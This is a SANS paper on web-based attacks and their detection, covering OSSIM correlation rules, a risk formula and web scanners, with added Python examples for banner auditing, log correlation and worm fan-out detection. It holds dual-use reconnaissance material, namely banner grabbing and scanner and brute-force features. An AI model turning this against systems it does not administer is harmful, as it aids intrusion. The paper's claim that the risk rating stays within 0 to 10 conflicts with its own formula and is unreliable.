7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 1/47
Interested in learning more about security?
SANS Institute
InfoSec Reading Room
This paper is from the SANS Institute Reading Room site. Reposting is not permitted without express written permission.
Web Based Attacks
Copyright SANS Institute
Author Retains Full Rights
Web Based Attacks
GCIA Gold Certification
Author: Justin Crist, jcrist@secureworks.com
Adviser: Jim Purcell
Web Based Attacks
Justin Crist 2
Abstract
Attacks upon information security infrastructures have continued to evolve steadily over time; legacy network based attacks have largely been replaced by more sophisticated web application based attacks. This paper will introduce and address web based attacks from attack to detection. Information security professionals new to application layer attacks will be in a better position to understand the underlying application attack vectors and methods of mitigation after reading this paper.
Table of Contents
Abstract ... 2
Table of Contents ... 3
Introduction ... 4
What is a web based attack? ... 5
Who is at risk from Web Based Attacks ... 7
Three Aspects of a Web Based Attack ... 8
  Vulnerability Prevention ... 8
  Attack ... 8
  Attack Detection & Prevention ... 9
Prevention/Detection Methods ... 11
  Log Monitoring and Correlation Tools ... 12
  OSSIM: For detecting attacks ... 15
  Proprietary Detection/Prevention Tools ... 25
    Watchfire AppScan ... 25
  Open Source Prevention Tools ... 30
    Nikto ... 30
    WebScarab ... 31
Secure Coding ... 33
OWASP ... 34
  Top Ten Highlights ... 35
  SQL Injection Attack Example ... 39
  Unvalidated Input Example: XSS ... 40
Summary ... 42
Introduction:
Before discussing web application security or attacks it is vitally important to understand the evolution of web applications, their increasing complexity and the paramount importance that they play in over one billion peoples' lives today (Internet World Stats).

The advent of first generation web applications was severely limited in their ability to provide any more information than a brochure you might receive in the mail. Static HTML was provided as a tool to display pictures and inert information. Consequently, as the internet and web access became more and more ubiquitous, so too did the needs of those users who were accessing web applications. As a result web applications evolved to provide user conveniences such as searching, posting, and uploading.

CGI, the Common Gateway Interface protocol, was the first leap forward in this progression. CGI provided a means for users to interact with web pages by submitting data into forms. Upon submission, back end CGI scripts would process the data presented and re-present HTML back to the end user. CGI, through its interaction with end users, effectively became one of the first web application attack vectors known.

As mentioned earlier, web application development did not stop with CGI scripts; instead newer, more evolved frameworks manifested. PHP, ASP.NET, J2EE, AJAX, Ruby on Rails, and others emerged to incorporate more interactive features which allow users more flexibility and power when managing data and workflow within web applications.
Securing web applications has become incredibly important as the information processed by web applications has become critical to corporations, customers, organizations, and countries. Web applications manage a wide array of information including financial data, medical records, social security numbers, intellectual property and national security data. Web applications must handle this information securely while maintaining efficiency and availability.
What is a web based attack?
Web based attacks are considered by security experts to be the greatest and oftentimes the least understood of all risks related to confidentiality, availability, and integrity. (cite)

The purpose of a web based attack is significantly different than other attacks; in most traditional penetration testing exercises a network or host is the target of attack. Web based attacks focus on an application itself and function on layer 7 of the OSI model. John Pescatore of the Gartner group claims that nearly 70% of all attacks occur at the application layer (Desmond, 2004).

Application vulnerabilities could provide the means for malicious end users to breach a system's protection mechanisms, typically to take advantage of or gain access to private information or system resources. Information gathered can include social security numbers, dates of birth, and maiden names, which are all often used in identity theft. Another popular target for attackers is credit card data which, left unprotected and unencrypted, can be used to cause significant damage to organizations' most valued assets, their customers.

So what makes up an application attack? By definition, all web application attacks are comprised of at least one normal request or a modified request aimed at taking advantage of poor parameter checking or instruction spoofing. There are six fundamental categories of application attacks.
Spoofing:
Spoofing is the act of mimicking another user or process to perform a task or retrieve information that would normally not be allowed. An attacker could use a crafted HTTP request containing the session id information from another user and retrieve the targeted user's account information.
Repudiation:
In order to tie specific actions to a single user, applications must have reasonable repudiation controls such as web access, authentication, and database transaction logs. Without corroborating logs, online web application users could easily claim that they did not transfer equities from one account to an external account of another. Without proof otherwise, all online brokerages would be required to reimburse the client for lost funds. Aggregating and correlating logs from multiple sources (web application, middleware, and database) can prevent repudiation attacks.
Information Disclosure:
Information disclosure is one of the biggest threats to large organizations who maintain private information about their customer base. When attackers are capable of revealing private information about a user or users of a web site, consumer confidence in that organization can take drastic hits, causing loss in sales, stock price, and overall marketability. To prevent this, applications must require adequate controls which will prevent user ID and session manipulation.
Denial of Service:
Denial of service attacks are likely the most well known of all application attacks, often generated by malicious users, competitors or script kiddies. Motivations for this type of an attack range from personal to political reasons in hopes of stifling an organization's ability to field online business. Famous examples include attacks upon SCO a couple of years ago by individuals upset about lawsuits aimed at Linux.
Elevation of Privileges:
Authorization controls which are both reliable and staunch are requisite for any system or application which guards sensitive information. Escalation of privileges requires a malicious user to either already possess, or gain through unlawful methods, the authorization privileges of a regular user. Once the malicious user is logged into the victim system an attempt will be made at exploitation of an application through poor parameter checking or instruction spoofing.
Who is at risk from Web Based Attacks
All organizations which maintain a web presence are at risk of being attacked. However, the level of risk is different for each organization. A couple of factors that play into consideration when determining the threat level are intellectual property or personally identifiable information stored by the organization.
Intellectual property:
Intellectual property is a product of the intellect that has commercial value, including copyrighted property such as literary or artistic works, and ideational property, such as patents, appellations of origin, business methods, and industrial processes. Companies where success and reputation are built upon patents, research, and development are especially at risk. Great examples include pharmaceutical companies, chip fabricators and universities.
Personally Identifiable Information:
Nearly all organizations which interface with customers hold to some degree information which is considered to be sensitive. For attackers to perpetrate financial crimes or identity theft they need credit card numbers, phone numbers, addresses, health related information, bank account numbers (Krebs, 2006). As such this information has become a commodity in underground IRC chat rooms.
Three Aspects of a Web Based Attack
Vulnerability Prevention:
The first step in a comprehensive application security framework starts with developers. Software architecture, just like building physical structures, requires sound planning and oversight, with an adherence to fundamental software development lifecycle methodologies. Many software developers carry the skills to properly proofread and locate vulnerabilities. However, as an insurance policy of sorts, exploitation detection tools are required to provide a standard level of error checking.
Attack:
For individuals interested in conducting an application based attack it is first necessary to understand and identify a target system. This first stage in an attack is commonly referred to as reconnaissance; reconnaissance can be performed using a variety of tools such as port scanners and vulnerability scanners. These scanners are often flexible enough to look for specific listening ports associated with suspected vulnerable applications. Application version detection can be performed by banner grabbing. Banner grabbing is the process of connecting to a host on a specific TCP/UDP port and listening to what the host replies with. Once a connection is established applications will commonly identify or provide version or build information relevant to the application that host is using. By grabbing banners attackers are quickly able to cross reference application versions, patch levels, and build information to online references which list vulnerable applications. In addition to online resources which list vulnerable applications, many freely available tools contain self contained and dynamically updating databases which perform application mapping to current vulnerabilities. A closer in depth look at several of these will follow in a later section.
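The defender's counterpart to the banner grabbing described above, added here as an example (not code from the paper): it parses service banners for product and version strings and ranks which of your own services volunteer the information that gets cross referenced against vulnerability lists. The host names and banners are constructed; grab_banner() is a plain socket collector for hosts you administer and is not used by the offline sample.

```python
"""Banner-disclosure audit for hosts you administer (added example, not from the paper)."""
import re
import socket

# Constructed sample banners keyed by (host, port); hosts and versions are made up.
SAMPLE_BANNERS = {
    ("mail.example.internal", 25): "220 mail.example.internal ESMTP Postfix (Ubuntu)\r\n",
    ("web.example.internal", 80): "HTTP/1.1 200 OK\r\nServer: Apache/2.2.3 (CentOS)\r\nContent-Type: text/html\r\n\r\n",
    ("bastion.example.internal", 22): "SSH-2.0-OpenSSH_7.4\r\n",
    ("hardened.example.internal", 80): "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n",
}

# Patterns that pull a product and an optional version out of common banner formats.
_PATTERNS = [
    # SSH identification string, e.g. SSH-2.0-OpenSSH_7.4
    re.compile(r"^SSH-\d\.\d-(?P<product>[A-Za-z]+)[_ ]?(?P<version>\d[\w.]*)?", re.M),
    # HTTP Server header, e.g. Server: Apache/2.2.3 (CentOS)
    re.compile(r"^Server:\s*(?P<product>[A-Za-z][\w-]*)(?:/(?P<version>[\w.]+))?", re.M),
    # SMTP greeting, e.g. 220 host ESMTP Postfix 2.3
    re.compile(r"^220 \S+ ESMTP (?P<product>[A-Za-z]+)(?:\s+(?P<version>\d[\w.]*))?", re.M),
]

_SEVERITY_ORDER = {"version-disclosed": 0, "product-disclosed": 1, "generic": 2}


def parse_banner(banner: str) -> dict:
    """Return product/version found in a banner and whether a version is disclosed."""
    for pattern in _PATTERNS:
        m = pattern.search(banner)
        if m:
            return {
                "product": m.group("product"),
                "version": m.group("version"),
                "discloses_version": m.group("version") is not None,
            }
    return {"product": None, "version": None, "discloses_version": False}


def audit(banners: dict) -> list:
    """Rank services by how much they give away: version, product only, or nothing.

    Returns (host, port, severity, product, version) tuples, worst first."""
    findings = []
    for (host, port), banner in banners.items():
        info = parse_banner(banner)
        if info["discloses_version"]:
            severity = "version-disclosed"
        elif info["product"]:
            severity = "product-disclosed"
        else:
            severity = "generic"
        findings.append((host, port, severity, info["product"], info["version"]))
    return sorted(findings, key=lambda f: (_SEVERITY_ORDER[f[2]], f[0], f[1]))


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Collect a banner from a host you administer. SSH and SMTP speak first;
    HTTP needs a request before it answers. Returns '' if nothing arrives."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if port in (80, 8080):
            sock.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        try:
            return sock.recv(1024).decode("utf-8", "replace")
        except socket.timeout:
            return ""


if __name__ == "__main__":
    for host, port, severity, product, version in audit(SAMPLE_BANNERS):
        print(f"{severity:18} {host}:{port} {product or '-'} {version or '-'}")
```

Services that come out as version-disclosed are the ones to fix first by suppressing the version in the server configuration.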
Attack Detection & Prevention:
Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) are also used as detective and reactive devices for both network and application targeted attacks. They are commonly deployed within the demilitarized zones (DMZs) of corporate networks and either passively filter or actively block attacks targeted at application layer services. IDSs and IPSs both work at the network layer by listening to network traffic destined to protected systems for attacks against vulnerable services, data manipulation attacks on applications, privilege escalation on hosts, multiple failed unauthorized logins, and even access to sensitive data. Upon successful detection, IDS alerts are usually sent to a central console where action by an analyst can be taken. Intrusion Prevention Systems, upon detection of an attack, can drop the packets, send TCP resets to the offending IP or shun further connections by malicious attackers for a variable period of time. Some Intrusion Detection Systems have the ability to thwart offending attackers by communicating directly with a firewall or router to block the source IP address.
Reverse web proxies are one of many tools that can be used to not only detect, but protect an application server from unauthorized, malicious, or inappropriate calls, posts, or queries to online web applications, services and databases. A reverse web proxy works by intercepting traffic destined to a protected web application or service and then applying filters to detect malicious commands, bad syntax, inappropriate content, and the like. By standing in front of the web applications, the proxy allows the web application to focus on legitimate requests.
Many firewalls sold in the marketplace today are application aware and as such understand many of the ubiquitous protocols and commands. In understanding these protocols and applications they are able to ascertain whether or not traffic destined for an application or network based service is malicious. Common applications include telnet, SSH, HTTP, FTP, SMTP and SIP. When tuned properly these firewalls are capable of thwarting many common attacks waged against vulnerable applications or protocols. Upon inspection of malicious payloads or commands sent to an application, these advanced firewalls will usually offer the ability to drop malicious packets, enact temporary or permanent filters against all traffic from the offending IP, or send an alert to security personnel so that further action can be taken.
Prevention/Detection Methods
Many methodologies exist, and there is never one right solution or architecture for all environments. As previously discussed, there are more passive methods which include Intrusion Detection Systems (IDS). IDS systems simply alert on seemingly offensive traffic which is destined towards a protected asset or application. On the opposite end of the spectrum there are more preventative methods which include application-aware firewalls, reverse proxies, and Intrusion Detection Prevention (IDP), which not only actively monitor for attacks but attempt to block or change the environment such that further attacks are not successful in reaching the protected application or system.
For environments which contain known off the shelf applications which are using common protocols such as FTP, HTTP, HTTPS, SMTP, and others, IDP can be very effective in protecting assets in a reactive fashion. For those larger environments which contain home grown applications, oddly configured application and service ports, or systems which do not follow RFC standards when communicating, IDS may be a more intelligent solution.
The reason is simple; IDP solutions typically block malicious traffic, or traffic which does not adhere to RFC standards. RFC standards, or Requests for Comments, are rules commissioned by the IETF which dictate proper communication methods and practices for nearly all well known protocols in use on the internet today. Many third party or home grown applications are built with one purpose in mind, to work. The adherence of a particular application or service to an RFC standard is very rarely a priority for application developers. As such, applications, especially legacy applications, are often put together in a hasty fashion with little regard for how they may or may not be affected by a security device such as IDP. It should be understood that IDP has only been around for a couple of years and is still a maturing technology.
Additionally, log analysis on critical files which are used by both applications and their underlying systems can provide good indications as to when an intrusion or unsuccessful penetration has occurred. There are a variety of both open source and proprietary tools which offer the ability to monitor key configuration files (integrity checkers) and log files (log correlation and monitoring tools). We will discuss examples of each of these in the next section.
Log Monitoring and Correlation Tools:
Gartner has identified SIEMs, or Security Information and Event Managers, as a means to provide "real-time event management and historical analysis of security data from a wide set of heterogeneous sources" (Gartner, 2005).
In larger organizations which often feature a multitude of servers spread across different geographies, log analysis and review becomes increasingly difficult and laborsome. "This stream of events and alerts—Gartner estimates that the systems in companies with more than 1000 users generate over 200 security 'events' per second—is enough to overwhelm any IT department", notes Jason Halloway of ExaProtect (Halloway, ExaProtect).
In this example, if an administrator or security minded engineer wishes to proactively review the logs of his or her managed systems, a number of steps must ensue.
1. It would be necessary to remotely login to these systems one at a time.
2. Filter log files for interesting events.
3. Match these 'interesting' events with other similar events on other managed systems.
This process was identified as far too time consuming, tedious, and prone to errors or mistakes. With this problem came the advent of log monitoring and correlation tools which serve to filter and match a log event on one device or application to a complementary or similar event on another system. Being privy to the logs or events which are occurring on different systems can lead to more intelligent decisions about the source of an attack, a misconfiguration of an application or system, or even an internal user who wishes to cause harm.
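The three manual steps above written as correlation logic, added here as an example (not code from the paper or from any SIEM product): it parses Apache-style access log lines already collected from several hosts, keeps the "interesting" ones (error responses), and reports source addresses whose interesting events touch more than one host inside a time window. Host names, addresses, paths and timestamps in the sample are constructed.

```python
"""Cross-host log correlation (added example, not from the paper or OSSIM)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "<host> <access-log line>", as a central collector would receive it.
SAMPLE_LOGS = """\
web1 203.0.113.7 - - [10/Mar/2007:10:02:11 +0000] "GET /login.php HTTP/1.1" 500 213
web1 198.51.100.4 - - [10/Mar/2007:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 5120
web2 203.0.113.7 - - [10/Mar/2007:10:03:40 +0000] "GET /login.php HTTP/1.1" 500 213
web1 203.0.113.7 - - [10/Mar/2007:10:04:02 +0000] "GET /admin/ HTTP/1.1" 403 77
web2 198.51.100.4 - - [10/Mar/2007:10:05:00 +0000] "GET /about.html HTTP/1.1" 200 3000
web3 203.0.113.7 - - [10/Mar/2007:12:30:00 +0000] "GET /cgi-bin/test HTTP/1.1" 404 0
"""

# host, client IP, ident, user, [timestamp], "method path protocol", status, size
LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line: str):
    """Step 1 stand-in: turn one collected line into an event dict, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["status"] = int(ev["status"])
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev


def interesting(ev: dict) -> bool:
    """Step 2: the filter. Here 'interesting' means the server answered with an error."""
    return ev["status"] >= 400


def correlate(lines, window=timedelta(minutes=10), min_hosts=2) -> dict:
    """Step 3: for each source IP, look for a window in which its interesting events
    touch at least `min_hosts` distinct hosts. Returns {ip: sorted list of hosts}."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and interesting(ev):
            by_ip[ev["ip"]].append(ev)
    hits = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        # Slide a window that starts at each event and collect the hosts seen inside it.
        for i, start in enumerate(events):
            hosts = {e["host"] for e in events[i:] if e["ts"] - start["ts"] <= window}
            if len(hosts) >= min_hosts:
                hits[ip] = sorted(hosts)
                break
    return hits


if __name__ == "__main__":
    for ip, hosts in correlate(SAMPLE_LOGS.splitlines()).items():
        print(f"{ip} produced errors on {', '.join(hosts)} within 10 minutes")
```

The same skeleton extends to other sources by adding a parser per log format and widening interesting() to the events that matter for that source.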
SIEM solutions are prevalent and there are a number of both proprietary and open source alternatives available. ArcSight, netForensics, Sentinel, and Intellitactics are but a few proprietary solutions that are available (Gartner, 2006). Open source solutions are also attractive for smaller businesses that may not have the budget for proprietary solutions, which oftentimes offer better scale and more robust support. OSSIM, or the Open Source Security Information Management tool, is a popular choice amongst the open source community. It offers many of the features of proprietary solutions without the high cost and licensing fees. A few screen shots have been added below.
Here we can see signature matches by source address, destination, etc. These can be sorted by the various columns and can help security analysts determine common denominators in an attack.
This screenshot shows the actual packet broken down into the different layers of the TCP/IP stack. This will be helpful in analyzing IDS signatures of valid attacks and even misconfigurations in applications and systems.

All screenshots were taken from www.ossim.net.
OSSIM: For detecting attacks
The larger a given organization's infrastructure, the more difficult it becomes to be proactive about detecting attacks before they can burgeon into wide scale problems. The reasons are numerous but can be narrowed to the following:
Systems are often distributed across disparate networks in different parts of a business unit, country, and even continent. Diverse organizations, teams, and business units with different attitudes manage these disparate networks. As a result patching, build procedures, network security, and general security best practices can take a back seat to other revenue generating activities.
Oftentimes different configuration standards and policies may be the result of regulatory requirements, government restrictions, and government supported export restrictions. It quickly becomes obvious that security analysts are faced with a staggering task. In order to perform the job successfully security analysts are required to understand a network topology that may span a multitude of countries. Achieving this thorough understanding of the lay of the land is often much easier said than done.
To assist, SIM packages coupled with network reconnaissance tools are often used to map out network topologies. OSSIM is an open source Security Information Manager that includes Nessus, a very popular and freely available vulnerability scanner, and Nmap, often considered to be one of the best available network mapping tools. Both Nessus and Nmap possess the ability to map network spaces. Network probing and the different methods of network discovery are beyond the scope of this paper. To comprehend the forthcoming example it is only necessary to understand that Nmap allows a security analyst to scan networks and visually map these networks. These pictures or visualizations allow security analysts to understand the inner workings of their mapped networks. Without these maps, learning curves are significantly steeper, and often breed unnecessary confusion amongst security analysts responsible for the network, network users, and network administrators. A layman can think of a network map as a street map. Street maps encourage common understanding by those that use the roads and those that provide directions.
For this particular example we will be using Nmap and Nessus. First, Nmap is initiated to probe IP address space which is owned by the parent organization of the security analyst. The results of this scan will yield all listening devices with a TCP/IP stack that are responsive to a variety of ICMP, TCP, and UDP sweeps.
Following the successful run of Nmap, a Nessus scan is initiated from within OSSIM against the previously discovered network hosts for vulnerabilities. After scanning is completed a list of known vulnerabilities of the scanned hosts is stored within the OSSIM database.

Nessus sample output for one host has been displayed below.
Because there are nearly always going to be emerging threats and unpatched vulnerabilities it is necessary to create a risk rating. OSSIM uses the following methodology to quantify risk. This is important for the security analyst to understand. These quantifications of risk allow an analyst to prioritize his or her attention towards the most burning issues.

Risk = (Asset * Priority * Reliability) / 10

Where:
Asset (0-5)
Priority (0-5)
Reliability (0-5)

The computed risk rating will always be between 0 and 10.
Asset Value
In determining asset values, the asset owner or data owner is generally responsible for classifying this for the security analyst. This step should not be overlooked as it enables security analysts to have an understanding of criticality amongst the various network hosts. Based upon this feedback an asset can be tagged with a value from 0-5. Customer data, intellectual property and the like might be tagged with a 4 or 5, while the system that stores the lunch menu for the cafeteria may receive a lower score, 0. These numerical values help an organization prioritize their security efforts, DR, and other contingency plans.
Priority/Threat
Priority or threat refers to the significance of a particular attack on a managed asset. In other words, what might be the disruption to my environment in the event that a particular vulnerability is being exposed? OSSIM is able to make decisions regarding priority relative to the environment that is under attack.

A common scenario in which OSSIM is able to help is described below.
A Microsoft Windows targeted virus, Code Red, has infiltrated the corporate network from the internet. Through the use of Snort, a popular open source Intrusion Detection System, it is detected that Code Red, an IIS targeted worm, is running rampant on the DMZ. Due to the sheer number of hosts that are found within the DMZ a security analyst can quickly find herself in a tenuous position of not knowing which hosts to protect first.

Though no security analyst should condone the spreading of worms in their network, it is safe to say that Windows IIS vulnerabilities will have little to no effect on a UNIX or Linux based server. At the same time as this Code Red attack is taking place against a UNIX server farm it also has the ability to spread to the corporate intranet subnet, which does contain unpatched Windows Servers running IIS. Applying higher priorities for this behavior in a Windows environment allows a security analyst to respond more appropriately, often decreasing the time for remediation.

To properly prioritize, OSSIM provides a method to prioritize threat levels. We will dive deeper into these directives in a subsequent section.
Reliability

Reliability speaks specifically to the likelihood that an alert which is logged by OSSIM is worthy of an alarm. An alert is simply any event that is logged from one of the many devices which log to OSSIM. This could be a log received from a router, firewall, or host on the network. Reliability starts to take into account patterns and characteristics in the events that are being logged. For example, if a Windows workstation connects on average to 20-30 hosts on TCP 135 during a given hour, this might be considered normal based upon the duties of this Windows host. However, if this same system begins to connect to 400-600 hosts in a half hour, it is reasonable to suspect a misconfiguration or perhaps even a compromised host.

Reliability of an alarm thus speaks to the likelihood that the alarm accurately depicts a scenario which, more often than not, needs to be acted upon.

Alarms within OSSIM can be triggered after a certain number of like events have been received. Coupled with asset values and priorities, a risk rating can be computed.
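As an added illustration of the reliability and risk discussion above (example code written for this edition, not code from the original paper or from OSSIM), the following Python detector counts how many distinct hosts each source reaches on the Windows RPC/SMB ports within a sliding window, flags the fan-out the text describes, and then scores the flagged host with the paper's risk formula. The flow-log format, the sample records, the asset values, the priority and reliability inputs and the thresholds are all constructed assumptions.

```python
"""Fan-out detector plus the paper's risk formula.

Added example, not code from the original paper or from OSSIM. The flow-log
format ("timestamp src dst dst_port"), the sample records, the asset values
and the thresholds below are constructed assumptions for illustration.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

WINDOWS_PORTS = {135, 137, 139, 445}   # the ports used in the directive rule below
BASE = datetime(2007, 2, 10, 9, 0, 0)   # start time of the constructed sample


def _flow(offset_s, src, dst, port):
    """Build one constructed flow record `offset_s` seconds after BASE."""
    stamp = (BASE + timedelta(seconds=offset_s)).isoformat()
    return f"{stamp} {src} {dst} {port}"


# Constructed sample: a normal workstation touching 25 hosts over an hour, and a
# suspicious host (10.0.1.77) touching 450 distinct hosts within 15 minutes.
SAMPLE_FLOWS = (
    [_flow(i * 144, "10.0.1.20", f"10.0.2.{i + 1}", 135) for i in range(25)]
    + [_flow(600 + i * 2, "10.0.1.77", f"10.0.{3 + i // 250}.{i % 250 + 1}", 135)
       for i in range(450)]
)

# Asset values (0-5) as the asset owner would supply them; constructed here.
ASSET_VALUES = {"10.0.1.20": 1, "10.0.1.77": 4}


def parse_flow(line):
    """Parse "timestamp src dst dst_port" into (datetime, src, dst, int port)."""
    stamp, src, dst, port = line.split()
    return datetime.fromisoformat(stamp), src, dst, int(port)


def fan_out_alerts(lines, window=timedelta(minutes=30), threshold=400):
    """Return {src: peak distinct destinations} for every source that reached
    at least `threshold` distinct hosts on WINDOWS_PORTS within any `window`."""
    per_src = defaultdict(list)
    for line in lines:
        stamp, src, dst, port = parse_flow(line)
        if port in WINDOWS_PORTS:
            per_src[src].append((stamp, dst))

    alerts = {}
    for src, events in per_src.items():
        events.sort()                    # the sliding window needs time order
        in_window = Counter()            # destinations currently inside the window
        start = 0
        peak = 0
        for stamp, dst in events:
            in_window[dst] += 1
            # Drop events that fell out of the window behind this one.
            while stamp - events[start][0] > window:
                old_dst = events[start][1]
                in_window[old_dst] -= 1
                if in_window[old_dst] == 0:
                    del in_window[old_dst]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts[src] = peak
    return alerts


def risk_rating(asset, priority, reliability):
    """The paper's formula: Risk = (Asset * Priority * Reliability) / 10,
    with each input on the 0-5 scale the paper gives. Note that the maximum
    inputs give 12.5, not 10, which is the caveat made in the text."""
    for value in (asset, priority, reliability):
        if not 0 <= value <= 5:
            raise ValueError(f"inputs must be 0-5, got {value}")
    return asset * priority * reliability / 10


def score_alerts(alerts, priority=3, reliability=3):
    """Attach a risk rating to each alerting source using its asset value
    (0 when the owner has not classified the host). The priority and
    reliability defaults are assumed values for a worm-like fan-out."""
    return {src: risk_rating(ASSET_VALUES.get(src, 0), priority, reliability)
            for src in alerts}


if __name__ == "__main__":
    found = fan_out_alerts(SAMPLE_FLOWS)
    for src, rating in score_alerts(found).items():
        print(f"{src}: {found[src]} distinct hosts in the window, risk {rating}")
```

The normal workstation never exceeds 13 distinct hosts in any 30 minute window and stays silent at the default threshold; the suspicious host reaches 450 and is reported with a rating of 3.6 for an asset valued at 4. Lowering the threshold shows how a looser reliability condition pulls ordinary hosts into the alarm set, which is the trade-off the text is describing.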
Power of Correlation

As mentioned before, directives are used within OSSIM. Directives are in essence rules or formulas which are used to calculate the potential classification or meaning of a series of received alerts.

For those familiar with Cisco ACLs, directives have a somewhat similar nomenclature which uses number ranges as identifiers:

- Generic ossim: 1-2999
- Attack correlation: 3000-5999
- Virus & Worms: 6000-8999
- Web attack correlation: 9000-11999
- DoS: 12000-14999
- Portscan/scan: 15000-17999
- Behaviour anomalies: 18000-20999
- Network abuse & error: 21000-23999
- Trojans: 24000-26999
- Miscellaneous: 27000-34999
Directives all start with an initial rule that attempts to match the directive and begin the event correlation. For example, take the example above where a Windows host connects to 400 Windows systems on port 135. We will illustrate this with a detector rule:

<rule type="detector" name="Potentially Suspicious"
      reliability="1" occurrence="500" from="ANY" to="ANY"
      port_to="135,137,139,445" plugin_id="50051" plugin_sid="ANY"
      time_out="360"/>

For this particular rule we match against anything going to a standard Windows port which reaches 500 occurrences, or connections, within the rule's time_out window. time_out is expressed in seconds, so the 360 shown gives a six minute window; matching the one hour baseline discussed earlier would need time_out="3600".

Detector rules match events received from agents which are reporting to OSSIM. Examples may include Apache, Snort, FW-1, etc. The power of OSSIM and correlation is the ability to receive information from disparate sources to arrive at a deeper conclusion or understanding of what is occurring in a network.

Below we have broken down the major fields within a directive rule.

Name simply represents the proper name of the directive.
Reliability is based upon the likelihood that this event is noteworthy. Directive rules in OSSIM express this on a 0 to 10 scale, and the directive's reliability rises as successive rules in it match.

Occurrence indicates how many times a particular event will have to occur before the rule is matched.

From indicates the source of the event.

To indicates the destination of the event.

Port_to indicates the destination port of the event. Port_from is not used here but can be defined for source port matching.

Events which occur by themselves are often not particularly noteworthy; however, when multiple sources are recording similar behaviors which differ from the norm, OSSIM is able to alert security analysts to this potentially interesting activity. The power that correlation can offer a security analyst should not be underestimated.

The following screen shot shows the structure of a directive that is built within OSSIM.
Below you will find a screen shot taken from OSSIM.net which indicates the likelihood of a Windows worm. Notice the correlation level, risk rating, and alarm.
Similarly the following screens can be used to corroborate any alarms which may be sent. Analysts have the ability to determine through this snapshot which hosts are responsible for sending and receiving the majority of the network traffic. Other screens indicate the timing of network usage. This information by itself may not be particularly telling; however, combined with the previous screen, certain hypotheses begin to take hold.
The following diagram indicates load at particular times of the day on a network. These diagrams can indicate network abuse, misconfigurations, worms, or even normal use. These data points can be trended over time and compared to previous days/months for patterns.
Proprietary Detection/Prevention Tools:

There are many schools of thought when it comes to deciding between a capable open source tool and a proprietary tool. Regardless of your stance there are many proven tools that offer both commercial support and support from the open source community. Below we will highlight a few of these.

Watchfire AppScan

Whilst the majority of application scanning tools offer the ability to scan for coding vulnerabilities only after an application has been built, Watchfire's AppScan distinguishes itself in that it can be used throughout the software development lifecycle. It is not limited to use after an application has been completely built. The ability to leverage AppScan during the development lifecycle enables security conscious developers to fix security issues earlier in development, thus saving considerable post-release fix dollars.
Some of the more common checks that AppScan performs include cross site scripting, privilege escalation, session state monitoring, HTTP response splitting, parameter tampering, hidden field manipulation, backdoors/debug options, and buffer overflows. What differentiates AppScan from many of the other proprietary and open source tools available is the wide variety of useful reports that are generated. Within the AppScan tool, remediation reports, executive dashboards, and compliance reporting are all offered. These features are increasingly valuable for larger, more risk averse organizations which are subject to compliance, privacy, and regulatory standards.

AppScan is provided as a Windows based GUI which has been intuitively laid out. A logical directory structure is laid out from left to right. Issues, Remediation, and Application data adorn the left side and are the featured main categories. From left to right the user may drill down successively.
Figure 1: AppScan
Figure 2: AppScan
WebInspect

WebInspect is another extremely popular web application scanner amongst many security professionals. WebInspect's application security assessment tools allow for the identification of known and unknown vulnerabilities. WebInspect can also check to ensure that a web application is secured properly, and attempt common web attacks such as parameter substitution/injection, cross site scripting, directory traversal attacks, and much more.

WebInspect features a user interface similar to the one featured in AppScan. However, it does offer the ability to interact with the reporting tools in real time as scans are being performed. Interactive reports are also available which allow for drilling down into particular areas of concern.

Figure 3: WebInspect

Popular and useful pre-bundled tools are favorites with WebInspect. Amongst the offered tools are:
• A Cookie Cruncher which allows a security practitioner to assess the strength of the cookies used in browsing sessions.
• An SPI Proxy which allows the security assessor to view each and every browser request and server response.
• WebBrute, which allows for brute forcing login forms.
• WebDiscovery, which allows for scanning of web services and correlates them to specific ports for later investigation.

Both of these tools have been extremely popular amongst both security consulting firms and software development houses which provide web presence software. As for which one to use, both companies offer a free trial.
Open Source Prevention Tools:

Nikto

Nikto is arguably the most popular web server scanner available in the open source community. Comprehensively scanning for over 3250 known dangerous files on as many as 600 server types, Nikto has its name firmly embedded amongst many seasoned security professionals as one of the premier web vulnerability scanners.

Nikto is a command line driven tool which features a wide variety of options including anti-IDS or evasion scanning tactics. These are helpful when testing IDS deployments for attack signatures and IDS responses.

As with the proprietary tools mentioned earlier, Nikto can be used as a preventative tool which can tip off developers to insecure configurations before critical web services are published to the World Wide Web or even to extranet partners. Nikto signature updates are similar to those featured in many popular antivirus tools; however, they are updated by the open source community.
Figure 4: Nikto
WebScarab

WebScarab is a Java application which has been published by the OWASP project, an open source led community which we will speak about in depth later. The WebScarab framework is often used to dissect applications which communicate over HTTP or HTTPS. Typical uses include locating, identifying, and altering posts and requests made by a web browser before they are sent off to a web server. These options allow a user to slow down the communication between a web client and server so that requests and responses can be analyzed properly. Oftentimes during this analysis the improper handling of credentials, logins, cookies, etc. is discovered, thus allowing a user to subvert the security controls inherent within the web applications being analyzed. WebScarab is most commonly used by application developers who wish to more completely secure the web applications they are serving.
WebScarab features are plentiful; however, the most commonly used include:

• Proxy: Able to observe both encrypted (HTTPS) and unencrypted traffic (HTTP). Encrypted traffic is viewed by terminating the browser's TLS connection at the proxy and establishing a second SSL/TLS connection between the proxy and the application web server.
• SessionID Analysis: a variety of cookies can be captured and analyzed to visually determine the randomness and unpredictability which should be inherent in all session identifier generation.
• Manual Request: previous requests to web applications can be edited and replayed.
